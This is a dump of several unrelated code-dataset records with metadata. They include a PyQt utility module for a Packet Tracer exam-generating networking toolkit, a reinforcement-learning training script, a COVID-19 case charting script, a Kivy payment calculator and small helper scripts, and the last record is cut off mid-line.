import QMessageBox\n\nfrom netaddr import IPNetwork\nimport math, socket, ipaddress\n\nimport os, platform\n#--------------------------------------------------------------------------------#\n# This class contains blueprint functions that allows quick build of gui objects #\n#--------------------------------------------------------------------------------#\n\nversion_number = 3.0\n\nclass blueprintFunctions:\n\n def getCurrentOS():\n return platform.system()\n\n def getDesktopPath(): # Returns the user' path to their Desktop\n if (blueprintFunctions.getCurrentOS() == \"Linux\"):\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n elif (blueprintFunctions.getCurrentOS() == \"Windows\"):\n desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n return desktop\n\n def deleteOutputFile():\n tab = [str(blueprintFunctions.getDesktopPath()) + \"/solution.txt\", str(blueprintFunctions.getDesktopPath()) + \"/solution_v2.txt\", str(blueprintFunctions.getDesktopPath()) + \"/packet-tracer.yaml\", str(blueprintFunctions.getDesktopPath()) + \"/packet-tracer_v2.yaml\"]\n for i in range(len(tab)):\n if (os.path.exists(tab[i])):\n os.remove(tab[i])\n\n def mkBtn (btn, geometry, style, text, small_size = False):\n btn.setGeometry(geometry)\n if (small_size is True):\n btn.setFont(font_btn2)\n else:\n btn.setFont(font_btn)\n btn.setStyleSheet(style)\n btn.setObjectName(str(btn))\n btn.setText(text)\n\n def mkLabPic (lab, geometry, picture, scaled):\n # Scaled => True or False\n lab.setGeometry(geometry)\n lab.setText(\"\")\n lab.setPixmap(picture)\n lab.setScaledContents(scaled)\n lab.setObjectName(str(lab))\n\n def mkLabel (lab, geometry, text, small_size = False):\n lab.setGeometry(geometry)\n if (small_size is True):\n lab.setFont(font_label2)\n else:\n lab.setFont(font_label)\n lab.setObjectName(str(lab))\n lab.setText(text)\n\n def mkLineEdit (edit, geometry, maxLength, text, small_size = False):\n edit.setGeometry(geometry)\n if (small_size is True):\n edit.setFont(font_linedit2)\n else:\n edit.setFont(font_linedit)\n edit.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n edit.setAlignment(QtCore.Qt.AlignCenter)\n edit.setMaxLength(maxLength)\n edit.setText(text)\n edit.setObjectName(str(edit))\n\n def mkBtnHome (btn, geometry):\n btn.setGeometry(geometry)\n btn.setObjectName(str(btn))\n btn.setStyleSheet(home_style)\n 
btn.setFont(font_btn)\n btn.setText(\"Home\")\n\n def mkGroupBox (gb, geometry, text, small_size = False):\n gb.setGeometry(geometry)\n if (small_size is True):\n gb.setFont(font_gb2)\n else:\n gb.setFont(font_gb)\n gb.setTitle(text)\n gb.setObjectName(str(gb))\n\n def mkCombo (combo, geometry, style):\n combo.setGeometry(geometry)\n combo.setFont(font_linedit)\n combo.setStyleSheet(style)\n combo.setObjectName(str(combo))\n\n def mkCheck (check, geometry, checked, text, small_size = False):\n check.setGeometry(geometry)\n if (small_size is True):\n check.setFont(font_label2)\n else:\n check.setFont(font_label)\n check.setLayoutDirection(QtCore.Qt.RightToLeft)\n check.setChecked(checked)\n check.setObjectName(str(check))\n check.setText(text)\n\n def mkRadio (rad, geometry, checked, text, small_size = False):\n rad.setGeometry(geometry)\n if (small_size is True):\n rad.setFont(font_label2)\n else:\n rad.setFont(font_label)\n rad.setLayoutDirection(QtCore.Qt.RightToLeft)\n rad.setChecked(checked)\n rad.setObjectName(str(rad))\n rad.setText(text)\n\n def mkWarningMsg(title, text):\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Warning)\n msg.setWindowIcon(QtGui.QIcon(\"img/worker-warning-msg.png\"))\n msg.setText(text)\n msg.setWindowTitle(title)\n msg.exec()\n\n def build_about_popup(self):\n import webbrowser\n msgBox = QMessageBox()\n #msgBox.setStyleSheet(\"background-color: rgb(147, 147, 147);\")\n msgBox.setWindowIcon(QtGui.QIcon(\"img/about.png\"))\n msgBox.setWindowTitle(\"About\")\n data = \"Networking Toolkit\"\n data += \"Application used to facilitate the generation of exams (Packet Tracer) via an easy-to-use GUI.\"\n data += \"\"\n data += \"Version : \" + str(version_number) + \"\"\n data += \"Os : Windows 10\"\n data += \"Python : \" + str(\n platform.python_version()) + \"\"\n data += \"© Morgan Valentin. 
All rights reserved.\"\n msgBox.setTextFormat(1) # Sets data to html type\n msgBox.setText(data)\n msgBox.setIcon(QMessageBox.Information)\n\n github_btn = msgBox.addButton('View project on github', QMessageBox.YesRole)\n github_btn.setStyleSheet(\"background-color: rgb(85, 255, 255);\")\n github_btn.setFont(font_btn3)\n github_btn.clicked.disconnect()\n github_btn.clicked.connect(lambda: webbrowser.open('https://github.com/momo007Dev/TFE-Networking_toolkit'))\n\n get_manual_btn = msgBox.addButton('Download the user manual', QMessageBox.YesRole)\n get_manual_btn.clicked.disconnect()\n get_manual_btn.setStyleSheet(\"background-color: rgb(85, 255, 127);\")\n get_manual_btn.setFont(font_btn3)\n get_manual_btn.clicked.connect(lambda: webbrowser.open('https://github.com/momo007Dev/TFE-Networking_toolkit/raw/main/Manuels.zip'))\n\n close_btn = msgBox.addButton('Close this window', QMessageBox.RejectRole)\n close_btn.setStyleSheet(\"background-color: rgb(255, 179, 179);\")\n close_btn.setFont(font_btn3)\n\n msgBox.exec_()\n\n # ---------------------------\n # Fills combo with /32 => /0\n #----------------------------\n def fillComboCidr (combo):\n for i in reversed(range(0,33)):\n combo.addItem(\"/\" + str(i))\n\n # ---------------------------\n # Fills combo with /30 => /0\n #----------------------------\n def fillComboCidr2 (combo):\n for i in reversed(range(0,31)):\n combo.addItem(\"/\" + str(i))\n combo.setCurrentIndex(6)\n\n def mkTable (table, geometry, style, col, row, small_size = False):\n table.setGeometry(geometry)\n if (small_size is True):\n table.setFont(font_table2)\n else:\n table.setFont(font_table)\n table.setStyleSheet(style)\n table.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)\n table.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n table.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)\n table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)\n table.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)\n table.setObjectName(str(table))\n table.setColumnCount(col)\n table.setRowCount(row)\n table.verticalHeader().setVisible(False)\n\n def addDataTable (table, position, text):\n item = QtWidgets.QTableWidgetItem()\n item.setText(text)\n table.setHorizontalHeaderItem(position, item)\n\n def checkIp(ip_string):\n try:\n network = ipaddress.IPv4Network(ip_string)\n return True\n except ValueError:\n return False\n\n def checkInt(str):\n if (str.isdigit()):\n return True\n else:\n return False\n\n\n #--------EXAM utils functions----------#\n\n def fillComboIpRule (combo):\n combo.addItem(\"1st IP Available\")\n combo.addItem(\"2nd IP Available\")\n combo.addItem(\"Last IP -1\")\n combo.addItem(\"Last IP Available\")\n\n def fillComboIntSwitch(combo):\n for i in reversed(range(1, 25)):\n combo.addItem(\"F0/\" + str(i))\n combo.addItem(\"G0/2\")\n combo.addItem(\"G0/1\")\n\n def fillComboIntRouter(combo):\n tab = {0: \"G\", 1: \"F\", 2: \"S\", 3: \"E\"}\n for i in tab:\n if (i == 2 or i==3): # S0/0/0\n n1 = 0\n n2 = 0\n while n2 <= 2:\n n3 = 0\n while n3 <= 1:\n combo.addItem(str(tab.get(i)) + str(n1) + \"/\" + str(n2) + \"/\" + str(n3))\n n3 += 1\n n2 += 1\n else: # F0/0 - G0/0\n n1 = 0\n while n1 <= 2:\n n2 = 0\n while n2 <= 2:\n combo.addItem(str(tab.get(i)) + str(n1) + \"/\" + str(n2))\n n2 += 1\n n1 += 1\n\n def format_output_interface(text):\n if (text[0] == \"G\"):\n string = \"GigabitEthernet\" + str(text[1:])\n return string\n elif (text[0] == \"F\"):\n string = \"FastEthernet\" + str(text[1:])\n return string\n elif 
(text[0] == \"S\"):\n string = \"Serial\" + str(text[1:])\n return string\n elif (text[0] == \"E\"):\n string = \"Ethernet\" + str(text[1:])\n return string\n else:\n return text\n\n def fillComboPortTcp(combo):\n combo.addItem(\"20 (FTP)\")\n combo.addItem(\"21 (FTP)\")\n combo.addItem(\"22 (SSH)\")\n combo.addItem(\"23 (Telnet)\")\n combo.addItem(\"25 (SMTP)\")\n combo.addItem(\"80 (HTTP)\")\n combo.addItem(\"110 (POP3)\")\n combo.addItem(\"115 (SFTP)\")\n combo.addItem(\"143 (IMAP)\")\n combo.addItem(\"443 (HTTPS)\")\n\n def fillComboPortUdp(combo):\n combo.addItem(\"53 (DNS)\")\n combo.addItem(\"69 (TFTP)\")\n combo.addItem(\"123 (NTP)\")\n\n #--------END----------------------------#\n\n#----------------\n# FONT USED\n#----------------\nfont_btn = QtGui.QFont()\nfont_btn.setPointSize(10)\nfont_btn.setBold(True)\nfont_btn.setWeight(75)\n\nfont_btn2 = QtGui.QFont()\nfont_btn2.setPointSize(9)\nfont_btn2.setBold(True)\nfont_btn2.setWeight(75)\n\nfont_btn3 = QtGui.QFont()\nfont_btn3.setPointSize(8)\nfont_btn3.setBold(True)\n\nfont_label = QtGui.QFont()\nfont_label.setPointSize(12)\nfont_label.setBold(True)\nfont_label.setUnderline(True)\nfont_label.setWeight(75)\n\nfont_label2 = QtGui.QFont()\nfont_label2.setPointSize(10)\nfont_label2.setBold(True)\nfont_label2.setUnderline(True)\nfont_label2.setWeight(75)\n\nfont_linedit = QtGui.QFont()\nfont_linedit.setFamily(\"Verdana\")\nfont_linedit.setPointSize(10)\nfont_linedit.setBold(True)\nfont_linedit.setWeight(75)\n\nfont_linedit2 = QtGui.QFont()\nfont_linedit2.setFamily(\"Verdana\")\nfont_linedit2.setPointSize(8)\nfont_linedit2.setBold(True)\nfont_linedit2.setWeight(75)\n\nfont_gb = QtGui.QFont()\nfont_gb.setPointSize(12)\nfont_gb.setBold(True)\nfont_btn.setUnderline(False)\nfont_gb.setWeight(75)\n\nfont_gb2 = QtGui.QFont()\nfont_gb2.setPointSize(10)\nfont_gb2.setBold(False)\nfont_gb2.setUnderline(False)\n\nfont_table = QtGui.QFont()\nfont_table.setPointSize(9)\n\nfont_table2 = QtGui.QFont()\nfont_table2.setPointSize(7)\n\n#---------------------\n# STYLESHEETS USED\n#---------------------\nhome_style =\"background-color: rgb(125, 255, 255);\"", "repo_name": "momo007Dev/TFE-Networking_toolkit", "sub_path": "code/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 11574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "platform.system", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 66, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 99, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 110, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 110, 
"usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Warning", "line_number": 117, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 117, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 118, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 118, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 125, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 127, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 127, "usage_type": "name"}, {"api_name": "platform.python_version", "line_number": 135, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Information", "line_number": 139, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 139, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.YesRole", "line_number": 141, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 141, "usage_type": "name"}, {"api_name": "webbrowser.open", "line_number": 145, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.YesRole", "line_number": 147, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 147, "usage_type": "name"}, {"api_name": "webbrowser.open", "line_number": 151, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.RejectRole", "line_number": 153, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 153, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 181, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 182, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractScrollArea", "line_number": 183, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 183, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 184, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 184, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 185, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 185, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 192, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 192, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Network", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 283, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 283, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 288, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 288, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 293, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 293, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 297, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 297, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 303, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 303, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 309, "usage_type": 
"call"}, {"api_name": "PyQt5.QtGui", "line_number": 309, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 315, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 315, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 321, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 321, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 327, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 327, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 332, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 332, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 335, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 335, "usage_type": "name"}]} +{"seq_id": "17246164625", "text": "from arguments import get_args\nargs = get_args()\nimport os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"2\"\nimport gym\nimport torch\nprint(torch.cuda.device_count())\ntorch.cuda.set_device(int(args.gpuid))\nimport gym_gvgai as gvg\nfrom stable_baselines3 import DQN, A2C, PPO\nfrom stable_baselines3.dqn.policies import DQNPolicy\n\nfrom environment.GOLOEnv import GOLOEnv\nimport sys\nimport numpy as np\nfrom networks import SingleConvExtractor, DoubleInputConvExatractor\nfrom stable_baselines3.common.policies import ActorCriticPolicy\nfrom stable_baselines3.common.env_util import make_vec_env\nfrom stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnv\n\nfrom stable_baselines3.common.evaluation import evaluate_policy\nfrom stable_baselines3.common.callbacks import CheckpointCallback, EveryNTimesteps\nnp.set_printoptions(threshold=sys.maxsize)\n\n\n\n\nif __name__ == '__main__':\n if args.use_one_hot:\n if args.use_local_observation:\n folder = \"onehot_golo/\"\n else:\n folder = \"onehot_go/\"\n else:\n if args.use_local_observation:\n folder = \"img_golo/\"\n else:\n folder = \"img_go/\"\n\n\n folder += args.env_name +\"/\"\n log_path = args.log_dir + folder\n save_path = args.save_dir + folder\n print(save_path)\n model_name = args.algo+\"_\"+args.env_name+\"_\"+\"onehot_\"+str(args.use_one_hot)+\"_lo_\"+str(args.use_local_observation)\n print(\"model name\",model_name)\n assert args.algo in [\"DQN\", \"A2C\", \"PPO\"]\n save_path = os.path.join(save_path,model_name)\n if save_path is not None:\n os.makedirs(save_path, exist_ok=True)\n checkpoint_on_event = CheckpointCallback(save_freq=1, save_path=save_path)\n event_callback = EveryNTimesteps(n_steps=100000, callback=checkpoint_on_event)\n \n\n if args.algo == \"DQN\":\n env = GOLOEnv(args.env_name, args.use_one_hot, args.use_local_observation,args.algo)\n else:\n print(args.algo)\n env = make_vec_env(\n GOLOEnv, n_envs=8, vec_env_cls=SubprocVecEnv, env_kwargs={\"game\": args.env_name, \"use_one_hot\": args.use_one_hot, \"use_LO\": args.use_local_observation,\"algorithm\":args.algo})\n if args.use_local_observation:\n extractor_cls = DoubleInputConvExatractor\n else:\n extractor_cls = SingleConvExtractor\n\n policy_kwargs = {\n \"features_extractor_class\": extractor_cls,\n \"features_extractor_kwargs\": {'one_hot': args.use_one_hot},\n 'net_arch': []\n }\n if args.algo == \"DQN\":\n agent = DQN(\n DQNPolicy, env, buffer_size=40000, verbose=1,\n learning_starts=0, policy_kwargs=policy_kwargs, tensorboard_log=log_path\n )\n elif args.algo == \"A2C\":\n agent = A2C(\n ActorCriticPolicy, env, verbose=1,\n policy_kwargs=policy_kwargs, tensorboard_log=log_path\n )\n elif args.algo 
== \"PPO\":\n agent = PPO(\n ActorCriticPolicy, env, verbose=1,\n policy_kwargs=policy_kwargs, tensorboard_log=log_path\n )\n print(args.total_timesteps)\n agent.save(save_path+\"/rl_model_0\")\n #default log_interval=1000\n agent.learn(total_timesteps=args.total_timesteps, callback=event_callback, log_interval=100)\n agent.save(save_path + \"final\" + args.algo)\n\n\n", "repo_name": "SUSTechGameAI/DORL", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 3261, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "arguments.get_args", "line_number": 2, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 7, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.cuda.set_device", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.set_printoptions", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 50, "usage_type": "call"}, {"api_name": "stable_baselines3.common.callbacks.CheckpointCallback", "line_number": 51, "usage_type": "call"}, {"api_name": "stable_baselines3.common.callbacks.EveryNTimesteps", "line_number": 52, "usage_type": "call"}, {"api_name": "environment.GOLOEnv.GOLOEnv", "line_number": 56, "usage_type": "call"}, {"api_name": "stable_baselines3.common.env_util.make_vec_env", "line_number": 59, "usage_type": "call"}, {"api_name": "environment.GOLOEnv.GOLOEnv", "line_number": 60, "usage_type": "argument"}, {"api_name": "stable_baselines3.common.vec_env.SubprocVecEnv", "line_number": 60, "usage_type": "name"}, {"api_name": "networks.DoubleInputConvExatractor", "line_number": 62, "usage_type": "name"}, {"api_name": "networks.SingleConvExtractor", "line_number": 64, "usage_type": "name"}, {"api_name": "stable_baselines3.DQN", "line_number": 72, "usage_type": "call"}, {"api_name": "stable_baselines3.dqn.policies.DQNPolicy", "line_number": 73, "usage_type": "argument"}, {"api_name": "stable_baselines3.A2C", "line_number": 77, "usage_type": "call"}, {"api_name": "stable_baselines3.common.policies.ActorCriticPolicy", "line_number": 78, "usage_type": "argument"}, {"api_name": "stable_baselines3.PPO", "line_number": 82, "usage_type": "call"}, {"api_name": "stable_baselines3.common.policies.ActorCriticPolicy", "line_number": 83, "usage_type": "argument"}]} +{"seq_id": "73615337794", "text": "#!/bin/python3\n\nimport urllib.request\nimport json\nimport pygal\n\n\nsauce = 'https://raw.githubusercontent.com/pomber/covid19/master/docs/timeseries.json'\n\nfile_obj = urllib.request.urlopen(sauce)\n\n# transfrom into string\ncontent = file_obj.read()\n\n# covid_data is 'content' , now in dict format\ncovid_data = json.loads(content)\n\ncountry_list_of_tuples = []\n\n\n\n\nfor i in covid_data:\n #i would be the country name\n \n country_list = covid_data[i]\n \n # Data is ACCUMLATIVE, so last_index, confirmed key value\n # capturing today's data, or any future date\n last_index = country_list[-1]\n \n \n last_confirmed = last_index[\"confirmed\"]\n \n # creating a tuple that holds the country name, and accumlative confimred value\n # ('Syria', 19), is format\n 
solo_country_tuple = (i,last_confirmed)\n \n \n # appending that tuple before overwritten with other data\n country_list_of_tuples.append(solo_country_tuple)\n \n\n# sorting the tuple according to their 1st index,'comfirmed', greatest to lowest\nsorted_country_tuples = sorted(country_list_of_tuples, key=lambda c: c[1], reverse=True)\n\n\n\n#######################################################################################\n# Intention: Build a program that charts corona virus cases for the top x countries, \n# ..where x is an integer entered by user input. \n\n\nprint(\"Chart the top 'x' countries with COVID-19 cases\")\nprint('-----------------------------------------------\\n')\n\n\n# user's 'X' input -----------------------------------------\nwhile True:\n try:\n x = int(input('Enter an integer between 1 and 187: '))\n print('\\n')\n while(x<= 0 or x > 187):\n print('Your input needs to be an integer between 1 and 187.')\n print('\\n')\n x = int(input(\"Try again and enter an integer between 1 and 187: \"))\n except:\n print(\"That's not an integer...\\n\")\n else:\n break\n \n# ---------------------------------------------------------\n\n\n\n# WIDTH AND HEIGHT ASSIGNMENT ------------------------------\n# The value of x determines the width and height of the chart\n\nif(x<11):\n width = 1000\n height = 800\nelif(x >= 11 or x < 50):\n width = 1200\n height = 1000\nelif(x >= 50 or x < 101):\n width = 1400\n height = 1300\nelse:\n width = 1500\n height = 1500\n\nchart = pygal.Line(width=width,height=height)\n\n# ---------------------------------------------------------\n\n\nchart.title = \"COVID-19 CASES\"\n\n\n\n# PLOT POINTS ----------------------------------------------\n\n# will equal to the number of 'x' indexes\ntop_x_tuples = sorted_country_tuples[:x]\n\nfor i in range(x):\n \n # holds all the confirmed case values for 'x' countries\n temp_lst = [] \n \n #access the name of the country\n for j in range(len(covid_data[top_x_tuples[i][0]])): \n \n # gets ALL the confirmed values\n temp_lst.append(covid_data[top_x_tuples[i][0]][j][\"confirmed\"]) \n \n \n # make a series for the country and the temp_lst as that country's data\n chart.add(top_x_tuples[i][0],temp_lst) \n \n# ---------------------------------------------------------\n\nchart.render()\n", "repo_name": "Ericgutie0/Covid_Cases_Chart", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 10, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 10, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "pygal.Line", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "39477817443", "text": "import pathlib\nHERE = pathlib.Path(__file__).absolute().parent\n\n\ndef update_url(root: pathlib.Path, path: pathlib.Path):\n if path.name == '_index.md':\n url = f'{path.parent.relative_to(root)}/'\n else:\n url = f'{path.parent.relative_to(root)}/{path.stem}/'\n\n frontmatter = []\n lines = []\n delemeter = 0\n for l in path.read_text().split('\\n'):\n if l.startswith('---'):\n delemeter += 1\n else:\n if delemeter == 0:\n raise Exception('no frontmatter')\n elif delemeter == 1:\n frontmatter.append(l)\n elif delemeter == 2:\n lines.append(l)\n else:\n raise 
Exception('too many ---')\n if lines and lines[-1] == '':\n lines.pop()\n\n with path.open('w') as f:\n f.write('---\\n')\n url_found = False\n for l in frontmatter:\n if l.startswith('url:'):\n f.write(f'url: \"{url}\"\\n')\n url_found = True\n else:\n f.write(l + '\\n')\n if not url_found:\n f.write(f'url: \"{url}\"\\n')\n f.write('---\\n')\n for l in lines:\n f.write(l + '\\n')\n print(f'{url}')\n\n\ndef traverse(root: pathlib.Path, path: pathlib.Path):\n\n for f in path.iterdir():\n if f.is_dir():\n traverse(root, f)\n else:\n if f.suffix == '.md':\n update_url(root, f)\n\n\ndef process(root: pathlib.Path, child: str):\n traverse(root, root / child)\n\n\nif __name__ == '__main__':\n process(HERE.parent / 'content/ja/docs', 'univrm')\n process(HERE.parent / 'content/en/docs', 'univrm')\n", "repo_name": "vrm-c/vrm.dev", "sub_path": "scripts/auto_url.py", "file_name": "auto_url.py", "file_ext": "py", "file_size_in_byte": 1667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 29, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 2, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "10080577469", "text": "# module platej_kivy2.py\nfrom kivy.app import App\n\nclass Platej(App):\n\n def raschet(self, tinp_summa, tinp_proc, tinp_k_mes):\n s = int(tinp_summa)\n p = float(tinp_proc)\n n = int(tinp_k_mes)\n i = p / 12 / 100\n a = s * i / (1 - (1 / (1 + i)) ** n)\n a = round(a, 2)\n return str(a)\n\nMainApp = Platej()\nMainApp.title = \"Monthly annuity payment calculation\"\n\nMainApp.run()", "repo_name": "Borisonix/kivy1", "sub_path": "rus_book/platej_kivy2.py", "file_name": "platej_kivy2.py", "file_ext": "py", "file_size_in_byte": 468, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "kivy.app.App", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "12599245990", "text": "from sqlalchemy.orm import Session\nfrom db.repository.users import \\\n retrieve_users_by_email, \\\n retrieve_users_by_login\nfrom db.models.user import User\n\n\ndef get_user_by_login_or_email(user_login_or_email: str, db: Session) -> User or None:\n user_by_email = retrieve_users_by_email(user_email=user_login_or_email, db=db)\n if len(user_by_email) == 1:\n return user_by_email[0]\n else:\n user_by_login = retrieve_users_by_login(user_login=user_login_or_email, db=db)\n if len(user_by_login) == 1:\n return user_by_login[0]\n else:\n return None\n", "repo_name": "Xzart/PoznanskaInicjatywaStrategiczna", "sub_path": "backend/db/repository/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.orm.Session", "line_number": 8, "usage_type": "name"}, {"api_name": "db.repository.users.retrieve_users_by_email", "line_number": 9, "usage_type": "call"}, {"api_name": "db.repository.users", "line_number": 9, "usage_type": "name"}, {"api_name": "db.repository.users.retrieve_users_by_login", "line_number": 13, "usage_type": "call"}, {"api_name": "db.repository.users", "line_number": 13, "usage_type": "name"}, {"api_name": "db.models.user.User", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "27641739564", 
"text": "import os\nimport re\nimport sys\nimport numpy\nimport matplotlib.pyplot as pyplot\n\ngenerations = []\naverage_results = []\nmax_results = []\nmin_results = []\n\nexperiment_number = 1\n\nif len(sys.argv) >= 2:\n experiment_number = sys.argv[1]\nelse:\n print(\"Which experiment do you want me to plot? (1/2/3 etc)\")\n experiment_number = input()\n\ntake = False\nif len(sys.argv) >= 3:\n take = int(sys.argv[2])\n\nworking_directory = os.getcwd() + \"\\\\experiment\" + experiment_number;\nroute = os.listdir(working_directory);\nroute.sort()\nfor directory in route:\n if not os.path.isdir(working_directory + \"\\\\\" + directory):\n continue\n generation_number = re.findall(\"(\\\\d+)\", directory)\n generations.append(int(generation_number[0]))\n file = open(working_directory + \"/\" + directory + \"/summary.txt\")\n lines = str.join(\"\", file.readlines())\n compiled = re.compile(\"Average: (-?\\d*\\.\\d*)\")\n average_results.append(float(compiled.findall(lines)[0]))\n compiled = re.compile(\"Max: (-?\\d+) - player: \\d+\")\n max_results.append(float(compiled.findall(lines)[0]))\n compiled = re.compile(\"Min: (-?\\d+) - player: \\d+\")\n min_results.append(float(compiled.findall(lines)[0]))\n\ngenerations, average_results, max_results, min_results = zip(*sorted(zip(generations, average_results, max_results, min_results)))\n\nif take:\n generations, average_results, max_results, 